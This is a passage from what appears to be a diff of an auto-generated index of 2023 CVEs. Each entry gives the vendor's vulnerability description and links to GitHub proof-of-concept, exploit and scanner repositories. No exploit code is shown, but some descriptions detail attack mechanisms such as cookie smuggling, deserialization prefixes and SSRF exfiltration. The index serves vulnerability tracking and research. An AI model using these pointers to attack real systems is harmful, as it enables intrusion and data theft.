[ducnorth2712/CVE-2023-23397](https://github.com/ducnorth2712/CVE-2023-23397) +- [sarsaeroth/CVE-2023-23397-POC](https://github.com/sarsaeroth/CVE-2023-23397-POC) +- [TheUnknownSoul/CVE-2023-23397-PoW](https://github.com/TheUnknownSoul/CVE-2023-23397-PoW) +- [Symbolexe/CVE-2023-23397](https://github.com/Symbolexe/CVE-2023-23397) + +### CVE-2023-23488 (2023-01-20) + +The Paid Memberships Pro WordPress Plugin, version < 2.9.8, is affected by an unauthenticated SQL injection vulnerability in the 'code' parameter of the '/pmpro/v1/order' REST route. + + +- [long-rookie/CVE-2023-23488-PoC](https://github.com/long-rookie/CVE-2023-23488-PoC) +- [cybfar/CVE-2023-23488-pmpro-2.8](https://github.com/cybfar/CVE-2023-23488-pmpro-2.8) + +### CVE-2023-23531 (2023-02-27) + +The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.2, iOS 16.3 and iPadOS 16.3. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges. + + +- [DarthOCE/MonkeyJB](https://github.com/DarthOCE/MonkeyJB) + +### CVE-2023-23583 (2023-11-14) + +Sequence of processor instructions leads to unexpected behavior for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or information disclosure and/or denial of service via local access. + + +- [Mav3r1ck0x1/CVE-2023-23583-Reptar-](https://github.com/Mav3r1ck0x1/CVE-2023-23583-Reptar-) + +### CVE-2023-23607 (2023-01-20) + +erohtar/Dasherr is a dashboard for self-hosted services. In affected versions unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server. The file /www/include/filesave.php allows for any file to uploaded to anywhere. If an attacker uploads a php file they can execute code on the server. This issue has been addressed in version 1.05.00. Users are advised to upgrade. There are no known workarounds for this issue.\n + + +- [Pylonet/CVE-2023-23607](https://github.com/Pylonet/CVE-2023-23607) + +### CVE-2023-23638 (2023-03-08) + +A deserialization vulnerability existed when dubbo generic invoke, which could lead to malicious code execution. \n\nThis issue affects Apache Dubbo 2.7.x version 2.7.21 and prior versions; Apache Dubbo 3.0.x version 3.0.13 and prior versions; Apache Dubbo 3.1.x version 3.1.5 and prior versions. + + +- [X1r0z/Dubbo-RCE](https://github.com/X1r0z/Dubbo-RCE) +- [YYHYlh/Apache-Dubbo-CVE-2023-23638-exp](https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp) +- [3yujw7njai/CVE-2023-23638-Tools](https://github.com/3yujw7njai/CVE-2023-23638-Tools) + +### CVE-2023-23752 (2023-02-16) + +An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. + + +- [yusinomy/CVE-2023-23752](https://github.com/yusinomy/CVE-2023-23752) +- [Saboor-Hakimi/CVE-2023-23752](https://github.com/Saboor-Hakimi/CVE-2023-23752) +- [Vulnmachines/joomla_CVE-2023-23752](https://github.com/Vulnmachines/joomla_CVE-2023-23752) +- [sw0rd1ight/CVE-2023-23752](https://github.com/sw0rd1ight/CVE-2023-23752) +- [wangking1/CVE-2023-23752-poc](https://github.com/wangking1/CVE-2023-23752-poc) +- [ibaiw/joomla_CVE-2023-23752](https://github.com/ibaiw/joomla_CVE-2023-23752) +- [ifacker/CVE-2023-23752-Joomla](https://github.com/ifacker/CVE-2023-23752-Joomla) +- [z3n70/CVE-2023-23752](https://github.com/z3n70/CVE-2023-23752) +- [keyuan15/CVE-2023-23752](https://github.com/keyuan15/CVE-2023-23752) +- [adriyansyah-mf/CVE-2023-23752](https://github.com/adriyansyah-mf/CVE-2023-23752) +- [GhostToKnow/CVE-2023-23752](https://github.com/GhostToKnow/CVE-2023-23752) +- [gibran-abdillah/CVE-2023-23752](https://github.com/gibran-abdillah/CVE-2023-23752) +- [Jenderal92/Joomla-CVE-2023-23752](https://github.com/Jenderal92/Joomla-CVE-2023-23752) +- [Acceis/exploit-CVE-2023-23752](https://github.com/Acceis/exploit-CVE-2023-23752) +- [karthikuj/CVE-2023-23752-Docker](https://github.com/karthikuj/CVE-2023-23752-Docker) +- [0xNahim/CVE-2023-23752](https://github.com/0xNahim/CVE-2023-23752) +- [adhikara13/CVE-2023-23752](https://github.com/adhikara13/CVE-2023-23752) +- [AkbarWiraN/Joomla-Scanner](https://github.com/AkbarWiraN/Joomla-Scanner) +- [Ge-Per/Scanner-CVE-2023-23752](https://github.com/Ge-Per/Scanner-CVE-2023-23752) +- [ThatNotEasy/CVE-2023-23752](https://github.com/ThatNotEasy/CVE-2023-23752) +- [Sweelg/CVE-2023-23752](https://github.com/Sweelg/CVE-2023-23752) +- [MrP4nda1337/CVE-2023-23752](https://github.com/MrP4nda1337/CVE-2023-23752) +- [lainonz/CVE-2023-23752](https://github.com/lainonz/CVE-2023-23752) +- [yTxZx/CVE-2023-23752](https://github.com/yTxZx/CVE-2023-23752) +- [AlissonFaoli/CVE-2023-23752](https://github.com/AlissonFaoli/CVE-2023-23752) +- [Pushkarup/CVE-2023-23752](https://github.com/Pushkarup/CVE-2023-23752) +- [blacks1ph0n/CVE-2023-23752](https://github.com/blacks1ph0n/CVE-2023-23752) +- [Youns92/Joomla-v4.2.8---CVE-2023-23752](https://github.com/Youns92/Joomla-v4.2.8---CVE-2023-23752) +- [Ly0kha/Joomla-CVE-2023-23752-Exploit-Script](https://github.com/Ly0kha/Joomla-CVE-2023-23752-Exploit-Script) +- [r3dston3/CVE-2023-23752](https://github.com/r3dston3/CVE-2023-23752) +- [svaltheim/CVE-2023-23752](https://github.com/svaltheim/CVE-2023-23752) +- [Fernando-olv/Joomla-CVE-2023-23752](https://github.com/Fernando-olv/Joomla-CVE-2023-23752) +- [K3ysTr0K3R/CVE-2023-23752-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT) +- [hadrian3689/CVE-2023-23752_Joomla](https://github.com/hadrian3689/CVE-2023-23752_Joomla) +- [C1ph3rX13/CVE-2023-23752](https://github.com/C1ph3rX13/CVE-2023-23752) +- [JeneralMotors/CVE-2023-23752](https://github.com/JeneralMotors/CVE-2023-23752) +- [gunzf0x/CVE-2023-23752](https://github.com/gunzf0x/CVE-2023-23752) +- [TindalyTn/CVE-2023-23752](https://github.com/TindalyTn/CVE-2023-23752) +- [shellvik/CVE-2023-23752](https://github.com/shellvik/CVE-2023-23752) +- [Rival420/CVE-2023-23752](https://github.com/Rival420/CVE-2023-23752) +- [JohnDoeAnonITA/CVE-2023-23752](https://github.com/JohnDoeAnonITA/CVE-2023-23752) +- [0xWhoami35/CVE-2023-23752](https://github.com/0xWhoami35/CVE-2023-23752) +- [mariovata/CVE-2023-23752-Python](https://github.com/mariovata/CVE-2023-23752-Python) +- [0xx01/CVE-2023-23752](https://github.com/0xx01/CVE-2023-23752) +- [n3rdh4x0r/CVE-2023-23752](https://github.com/n3rdh4x0r/CVE-2023-23752) +- [mil4ne/CVE-2023-23752-Joomla-v4.2.8](https://github.com/mil4ne/CVE-2023-23752-Joomla-v4.2.8) +- [Aureum01/CVE-2023-23752](https://github.com/Aureum01/CVE-2023-23752) + +### CVE-2023-23924 (2023-01-31) + +Dompdf is an HTML to PDF converter. The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing `<image>` tags with uppercase letters. This may lead to arbitrary object unserialize on PHP < 8, through the `phar` URL wrapper. An attacker can exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can provide a SVG file to dompdf. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will lead to the very least to an arbitrary file deletion and even remote code execution, depending on classes that are available.\n + + +- [motikan2010/CVE-2023-23924](https://github.com/motikan2010/CVE-2023-23924) + +### CVE-2023-23946 (2023-02-14) + +Git, a revision control system, is vulnerable to path traversal prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8. By feeding a crafted input to `git apply`, a path outside the working tree can be overwritten as the user who is running `git apply`. A fix has been prepared and will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5, v2.35.7, v2.34.7, v2.33.7, v2.32.6, v2.31.7, and v2.30.8. As a workaround, use `git apply --stat` to inspect a patch before applying; avoid applying one that creates a symbolic link and then creates a file beyond the symbolic link. + + +- [bruno-1337/CVE-2023-23946-POC](https://github.com/bruno-1337/CVE-2023-23946-POC) + +### CVE-2023-24044 (2023-01-22) + +A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header. NOTE: the vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature." + + +- [Cappricio-Securities/CVE-2023-24044](https://github.com/Cappricio-Securities/CVE-2023-24044) + +### CVE-2023-24055 (2023-01-22) + +KeePass through 2.53 (in a default installation) allows an attacker, who has write access to the XML configuration file, to obtain the cleartext passwords by adding an export trigger. NOTE: the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC. + + +- [deetl/CVE-2023-24055](https://github.com/deetl/CVE-2023-24055) +- [alt3kx/CVE-2023-24055_PoC](https://github.com/alt3kx/CVE-2023-24055_PoC) +- [Cyb3rtus/keepass_CVE-2023-24055_yara_rule](https://github.com/Cyb3rtus/keepass_CVE-2023-24055_yara_rule) +- [duckbillsecurity/CVE-2023-24055](https://github.com/duckbillsecurity/CVE-2023-24055) +- [julesbozouklian/PoC_CVE-2023-24055](https://github.com/julesbozouklian/PoC_CVE-2023-24055) +- [digital-dev/KeePass-TriggerLess](https://github.com/digital-dev/KeePass-TriggerLess) +- [zwlsix/KeePass-CVE-2023-24055](https://github.com/zwlsix/KeePass-CVE-2023-24055) + +### CVE-2023-24059 (2023-01-22) + +Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023. + + +- [gmh5225/CVE-2023-24059](https://github.com/gmh5225/CVE-2023-24059) + +### CVE-2023-24078 (2023-02-17) + +Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/. + + +- [overgrowncarrot1/CVE-2023-24078](https://github.com/overgrowncarrot1/CVE-2023-24078) +- [rio128128/CVE-2023-24078](https://github.com/rio128128/CVE-2023-24078) +- [ag-rodriguez/CVE-2023-24078](https://github.com/ag-rodriguez/CVE-2023-24078) + +### CVE-2023-24100 +- [badboycxcc/CVE-2023-24100](https://github.com/badboycxcc/CVE-2023-24100) + +### CVE-2023-24203 (-) + +Cross Site Scripting vulnerability in SourceCodester Simple Customer Relationship Management System v1.0 allows attacker to execute arbitary code via the company or query parameter(s). + + +- [momo1239/CVE-2023-24203-and-CVE-2023-24204](https://github.com/momo1239/CVE-2023-24203-and-CVE-2023-24204) + +### CVE-2023-24249 (2023-02-27) + +An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file. + + +- [IDUZZEL/CVE-2023-24249-Exploit](https://github.com/IDUZZEL/CVE-2023-24249-Exploit) + +### CVE-2023-24278 (2023-03-18) + +Squidex before 7.4.0 was discovered to contain a squid.svg cross-site scripting (XSS) vulnerability. + + +- [NeCr00/CVE-2023-24278](https://github.com/NeCr00/CVE-2023-24278) + +### CVE-2023-24317 (2023-02-23) + +Judging Management System 1.0 was discovered to contain an arbitrary file upload vulnerability via the component edit_organizer.php. + + +- [angelopioamirante/CVE-2023-24317](https://github.com/angelopioamirante/CVE-2023-24317) + +### CVE-2023-24329 (2023-02-17) + +An issue in the urllib.parse component of Python before 3.11.4 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters. + + +- [H4R335HR/CVE-2023-24329-PoC](https://github.com/H4R335HR/CVE-2023-24329-PoC) +- [Pandante-Central/CVE-2023-24329-codeql-test](https://github.com/Pandante-Central/CVE-2023-24329-codeql-test) +- [PenTestMano/CVE-2023-24329-Exploit](https://github.com/PenTestMano/CVE-2023-24329-Exploit) + +### CVE-2023-24488 (2023-07-10) + +Cross site scripting vulnerability in Citrix ADC and Citrix Gateway  in allows and attacker to perform cross site scripting + + +- [SirBugs/CVE-2023-24488-PoC](https://github.com/SirBugs/CVE-2023-24488-PoC) +- [securitycipher/CVE-2023-24488](https://github.com/securitycipher/CVE-2023-24488) +- [NSTCyber/CVE-2023-24488-SIEM-Sigma-Rule](https://github.com/NSTCyber/CVE-2023-24488-SIEM-Sigma-Rule) +- [raytheon0x21/CVE-2023-24488](https://github.com/raytheon0x21/CVE-2023-24488) + +### CVE-2023-24489 (2023-07-10) + +\nA vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller. + + +- [adhikara13/CVE-2023-24489-ShareFile](https://github.com/adhikara13/CVE-2023-24489-ShareFile) +- [whalebone7/CVE-2023-24489-poc](https://github.com/whalebone7/CVE-2023-24489-poc) + +### CVE-2023-24517 (2023-08-22) + +Unrestricted Upload of File with Dangerous Type vulnerability in the Pandora FMS File Manager component, allows an attacker to make make use of this issue ( unrestricted file upload ) to execute arbitrary system commands. This issue affects Pandora FMS v767 version and prior versions on all platforms. + + +- [Argonx21/CVE-2023-24517](https://github.com/Argonx21/CVE-2023-24517) + +### CVE-2023-24538 (2023-04-06) + +Templates do not properly consider backticks (`) as Javascript string delimiters, and do not escape them as expected. Backticks are used, since ES6, for JS template literals. If a template contains a Go template action within a Javascript template literal, the contents of the action can be used to terminate the literal, injecting arbitrary Javascript code into the Go template. As ES6 template literals are rather complex, and themselves can do string interpolation, the decision was made to simply disallow Go template actions from being used inside of them (e.g. "var a = {{.}}"), since there is no obviously safe way to allow this behavior. This takes the same approach as github.com/google/safehtml. With fix, Template.Parse returns an Error when it encounters templates like this, with an ErrorCode of value 12. This ErrorCode is currently unexported, but will be exported in the release of Go 1.21. Users who rely on the previous behavior can re-enable it using the GODEBUG flag jstmpllitinterp=1, with the caveat that backticks will now be escaped. This should be used with caution. + + +- [skulkarni-mv/goIssue_dunfell](https://github.com/skulkarni-mv/goIssue_dunfell) +- [skulkarni-mv/goIssue_kirkstone](https://github.com/skulkarni-mv/goIssue_kirkstone) + +### CVE-2023-24610 (2023-02-01) + +NOSH 4a5cfdb allows remote authenticated users to execute PHP arbitrary code via the "practice logo" upload feature. The client-side checks can be bypassed. This may allow attackers to steal Protected Health Information because the product is for health charting. + + +- [abbisQQ/CVE-2023-24610](https://github.com/abbisQQ/CVE-2023-24610) + +### CVE-2023-24706 +- [hatjwe/CVE-2023-24706](https://github.com/hatjwe/CVE-2023-24706) + +### CVE-2023-24709 (2023-03-21) + +An issue found in Paradox Security Systems IPR512 allows attackers to cause a denial of service via the login.html and login.xml parameters. + + +- [DRAGOWN/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC](https://github.com/DRAGOWN/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC) + +### CVE-2023-24749 +- [mahaloz/netgear-pwnagent](https://github.com/mahaloz/netgear-pwnagent) + +### CVE-2023-24775 (2023-03-07) + +Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\Member.php. + + +- [csffs/CVE-2023-24775-and-CVE-2023-24780](https://github.com/csffs/CVE-2023-24775-and-CVE-2023-24780) + +### CVE-2023-24871 (2023-03-14) + +Windows Bluetooth Service Remote Code Execution Vulnerability + + +- [ynwarcs/CVE-2023-24871](https://github.com/ynwarcs/CVE-2023-24871) + +### CVE-2023-24955 (2023-05-09) + +Microsoft SharePoint Server Remote Code Execution Vulnerability + + +- [former-farmer/CVE-2023-24955-PoC](https://github.com/former-farmer/CVE-2023-24955-PoC) + +### CVE-2023-24998 (2023-02-20) + +Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads.\n\n\n\n\nNote that, like all of the file upload limits, the\n new configuration option (FileUploadBase#setFileCountMax) is not\n enabled by default and must be explicitly configured.\n\n\n + + +- [nice1st/CVE-2023-24998](https://github.com/nice1st/CVE-2023-24998) + +### CVE-2023-25136 (2023-02-03) + +OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be leveraged, by an unauthenticated remote attacker in the default configuration, to jump to any location in the sshd address space. One third-party report states "remote code execution is theoretically possible." + + +- [jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free](https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free) +- [ticofookfook/CVE-2023-25136](https://github.com/ticofookfook/CVE-2023-25136) +- [Christbowel/CVE-2023-25136](https://github.com/Christbowel/CVE-2023-25136) +- [adhikara13/CVE-2023-25136](https://github.com/adhikara13/CVE-2023-25136) +- [nhakobyan685/CVE-2023-25136](https://github.com/nhakobyan685/CVE-2023-25136) +- [axylisdead/CVE-2023-25136_POC](https://github.com/axylisdead/CVE-2023-25136_POC) +- [H4K6/CVE-2023-25136](https://github.com/H4K6/CVE-2023-25136) +- [Business1sg00d/CVE-2023-25136](https://github.com/Business1sg00d/CVE-2023-25136) +- [malvika-thakur/CVE-2023-25136](https://github.com/malvika-thakur/CVE-2023-25136) + +### CVE-2023-25157 (2023-02-21) + +GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse. + + +- [win3zz/CVE-2023-25157](https://github.com/win3zz/CVE-2023-25157) +- [0x2458bughunt/CVE-2023-25157](https://github.com/0x2458bughunt/CVE-2023-25157) +- [murataydemir/CVE-2023-25157-and-CVE-2023-25158](https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158) +- [7imbitz/CVE-2023-25157-checker](https://github.com/7imbitz/CVE-2023-25157-checker) +- [Rubikcuv5/CVE-2023-25157](https://github.com/Rubikcuv5/CVE-2023-25157) +- [dr-cable-tv/Geoserver-CVE-2023-25157](https://github.com/dr-cable-tv/Geoserver-CVE-2023-25157) + +### CVE-2023-25194 (2023-02-07) + +A possible security vulnerability has been identified in Apache Kafka Connect API.\nThis requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config\nand a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0.\nWhen configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config`\nproperty for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the\n`producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties.\nThis will allow the server to connect to the attacker's LDAP server\nand deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server.\nAttacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.\n\nSince Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box\nconfigurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector\nclient override policy that permits them.\n\nSince Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage\nin SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka Connect 3.4.0. \n\nWe advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for \nvulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally,\nin addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector\nclient config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.\n + + +- [ohnonoyesyes/CVE-2023-25194](https://github.com/ohnonoyesyes/CVE-2023-25194) +- [YongYe-Security/CVE-2023-25194](https://github.com/YongYe-Security/CVE-2023-25194) +- [vulncheck-oss/cve-2023-25194](https://github.com/vulncheck-oss/cve-2023-25194) + +### CVE-2023-25202 +- [Trackflaw/CVE-2023-25202](https://github.com/Trackflaw/CVE-2023-25202) + +### CVE-2023-25203 +- [Trackflaw/CVE-2023-25203](https://github.com/Trackflaw/CVE-2023-25203) + +### CVE-2023-25234 (2023-02-27) + +Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromAddressNat via parameters entrys and mitInterface. + + +- [FzBacon/CVE-2023-25234_Tenda_AC6_stack_overflow](https://github.com/FzBacon/CVE-2023-25234_Tenda_AC6_stack_overflow) + +### CVE-2023-25260 (2023-03-28) + +Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Local File Inclusion. + + +- [trustcves/CVE-2023-25260](https://github.com/trustcves/CVE-2023-25260) + +### CVE-2023-25261 (2023-03-27) + +Certain Stimulsoft GmbH products are affected by: Remote Code Execution. This affects Stimulsoft Designer (Desktop) 2023.1.4 and Stimulsoft Designer (Web) 2023.1.3 and Stimulsoft Viewer (Web) 2023.1.3. Access to the local file system is not prohibited in any way. Therefore, an attacker may include source code which reads or writes local directories and files. It is also possible for the attacker to prepare a report which has a variable that holds the gathered data and render it in the report. + + +- [trustcves/CVE-2023-25261](https://github.com/trustcves/CVE-2023-25261) + +### CVE-2023-25262 (2023-03-28) + +Stimulsoft GmbH Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Server Side Request Forgery (SSRF). TThe Reporting Designer (Web) offers the possibility to embed sources from external locations. If the user chooses an external location, the request to that resource is performed by the server rather than the client. Therefore, the server causes outbound traffic and potentially imports data. An attacker may also leverage this behaviour to exfiltrate data of machines on the internal network of the server hosting the Stimulsoft Reporting Designer (Web). + + +- [trustcves/CVE-2023-25262](https://github.com/trustcves/CVE-2023-25262) + +### CVE-2023-25263 (2023-03-27) + +In Stimulsoft Designer (Desktop) 2023.1.5, and 2023.1.4, once an attacker decompiles the Stimulsoft.report.dll the attacker is able to decrypt any connectionstring stored in .mrt files since a static secret is used. The secret does not differ between the tested versions and different operating systems. + + +- [trustcves/CVE-2023-25263](https://github.com/trustcves/CVE-2023-25263) + +### CVE-2023-25292 (2023-04-27) + +Reflected Cross Site Scripting (XSS) in Intermesh BV Group-Office version 6.6.145, allows attackers to gain escalated privileges and gain sensitive information via the GO_LANGUAGE cookie. + + +- [brainkok/CVE-2023-25292](https://github.com/brainkok/CVE-2023-25292) +- [tucommenceapousser/CVE-2023-25292](https://github.com/tucommenceapousser/CVE-2023-25292) + +### CVE-2023-25355 (2023-04-04) + +CoreDial sipXcom up to and including 21.04 is vulnerable to Insecure Permissions. A user who has the ability to run commands as the `daemon` user on a sipXcom server can overwrite a service file, and escalate their privileges to `root`. + + +- [glefait/CVE-2023-25355-25356](https://github.com/glefait/CVE-2023-25355-25356) + +### CVE-2023-25581 (2024-10-10) + +pac4j is a security framework for Java. `pac4j-core` prior to version 4.0.0 is affected by a Java deserialization vulnerability. The vulnerability affects systems that store externally controlled values in attributes of the `UserProfile` class from pac4j-core. It can be exploited by providing an attribute that contains a serialized Java object with a special prefix `{#sb64}` and Base64 encoding. This issue may lead to Remote Code Execution (RCE) in the worst case. Although a `RestrictedObjectInputStream` is in place, that puts some restriction on what classes can be deserialized, it still allows a broad range of java packages and potentially exploitable with different gadget chains. pac4j versions 4.0.0 and greater are not affected by this issue. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [p33d/CVE-2023-25581](https://github.com/p33d/CVE-2023-25581) + +### CVE-2023-25610 +- [qi4L/CVE-2023-25610](https://github.com/qi4L/CVE-2023-25610) + +### CVE-2023-25690 (2023-03-07) + +Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack.\n\n\n\n\nConfigurations are affected when mod_proxy is enabled along with some form of RewriteRule\n or ProxyPassMatch in which a non-specific pattern matches\n some portion of the user-supplied request-target (URL) data and is then\n re-inserted into the proxied request-target using variable \nsubstitution. For example, something like:\n\n\n\n\nRewriteEngine on\nRewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P]\nProxyPassReverse /here/ http://example.com:8080/\n\n\nRequest splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.\n\n\n + + +- [tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL](https://github.com/tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL) +- [dhmosfunk/CVE-2023-25690-POC](https://github.com/dhmosfunk/CVE-2023-25690-POC) +- [thanhlam-attt/CVE-2023-25690](https://github.com/thanhlam-attt/CVE-2023-25690) + +### CVE-2023-25725 (2023-02-14) + +HAProxy before 2.7.3 may allow a bypass of access control because HTTP/1 headers are inadvertently lost in some situations, aka "request smuggling." The HTTP header parsers in HAProxy may accept empty header field names, which could be used to truncate the list of HTTP headers and thus make some headers disappear after being parsed and processed for HTTP/1.0 and HTTP/1.1. For HTTP/2 and HTTP/3, the impact is limited because the headers disappear before being parsed and processed, as if they had not been sent by the client. The fixed versions are 2.7.3, 2.6.9, 2.5.12, 2.4.22, 2.2.29, and 2.0.31. + + +- [sgwgsw/LAB-CVE-2023-25725](https://github.com/sgwgsw/LAB-CVE-2023-25725) + +### CVE-2023-25813 (2023-02-22) + +Sequelize is a Node.js ORM tool. In versions prior to 6.19.1 a SQL injection exploit exists related to replacements. Parameters which are passed through replacements are not properly escaped which can lead to arbitrary SQL injection depending on the specific queries in use. The issue has been fixed in Sequelize 6.19.1. Users are advised to upgrade. Users unable to upgrade should not use the `replacements` and the `where` option in the same query. + + +- [bde574786/Sequelize-1day-CVE-2023-25813](https://github.com/bde574786/Sequelize-1day-CVE-2023-25813) +- [White-BAO/CVE-2023-25813](https://github.com/White-BAO/CVE-2023-25813) +- [pbj2647/CVE-2023-25813](https://github.com/pbj2647/CVE-2023-25813) +- [wxuycea/CVE-2023-25813](https://github.com/wxuycea/CVE-2023-25813) +- [sea-middle/cve-2023-25813](https://github.com/sea-middle/cve-2023-25813) + +### CVE-2023-25950 (2023-04-11) + +HTTP request/response smuggling vulnerability in HAProxy version 2.7.0, and 2.6.1 to 2.6.7 allows a remote attacker to alter a legitimate user's request. As a result, the attacker may obtain sensitive information or cause a denial-of-service (DoS) condition. + + +- [dhmosfunk/HTTP3ONSTEROIDS](https://github.com/dhmosfunk/HTTP3ONSTEROIDS) + +### CVE-2023-26035 (2023-02-25) + +ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in This issue is fixed in versions 1.36.33 and 1.37.33. + + +- [rvizx/CVE-2023-26035](https://github.com/rvizx/CVE-2023-26035) +- [m3m0o/zoneminder-snapshots-rce-poc](https://github.com/m3m0o/zoneminder-snapshots-rce-poc) +- [heapbytes/CVE-2023-26035](https://github.com/heapbytes/CVE-2023-26035) +- [Yuma-Tsushima07/CVE-2023-26035](https://github.com/Yuma-Tsushima07/CVE-2023-26035) +- [0xfalafel/zoneminder_CVE-2023-26035](https://github.com/0xfalafel/zoneminder_CVE-2023-26035) + +### CVE-2023-26048 (2023-04-18) + +Jetty is a java based web server and servlet engine. In affected versions servlets with multipart support (e.g. annotated with `@MultipartConfig`) that call `HttpServletRequest.getParameter()` or `HttpServletRequest.getParts()` may cause `OutOfMemoryError` when the client sends a multipart request with a part that has a name but no filename and very large content. This happens even with the default settings of `fileSizeThreshold=0` which should stream the whole part content to disk. An attacker client may send a large multipart request and cause the server to throw `OutOfMemoryError`. However, the server may be able to recover after the `OutOfMemoryError` and continue its service -- although it may take some time. This issue has been patched in versions 9.4.51, 10.0.14, and 11.0.14. Users are advised to upgrade. Users unable to upgrade may set the multipart parameter `maxRequestSize` which must be set to a non-negative value, so the whole multipart content is limited (although still read into memory). + + +- [Trinadh465/jetty_9.4.31_CVE-2023-26048](https://github.com/Trinadh465/jetty_9.4.31_CVE-2023-26048) +- [hshivhare67/Jetty-v9.4.31_CVE-2023-26048](https://github.com/hshivhare67/Jetty-v9.4.31_CVE-2023-26048) + +### CVE-2023-26049 (2023-04-18) + +Jetty is a java based web server and servlet engine. Nonstandard cookie parsing in Jetty may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with `"` (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered. So, a cookie header such as: `DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d"` will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies. This has security implications because if, say, JSESSIONID is an HttpOnly cookie, and the DISPLAY_LANGUAGE cookie value is rendered on the page, an attacker can smuggle the JSESSIONID cookie into the DISPLAY_LANGUAGE cookie and thereby exfiltrate it. This is significant when an intermediary is enacting some policy based on cookies, so a smuggled cookie can bypass that policy yet still be seen by the Jetty server or its logging system. This issue has been addressed in versions 9.4.51, 10.0.14, 11.0.14, and 12.0.0.beta0 and users are advised to upgrade. There are no known workarounds for this issue. + + +- [hshivhare67/Jetty_v9.4.31_CVE-2023-26049](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2023-26049) + +### CVE-2023-26067 (2023-04-10) + +Certain Lexmark devices through 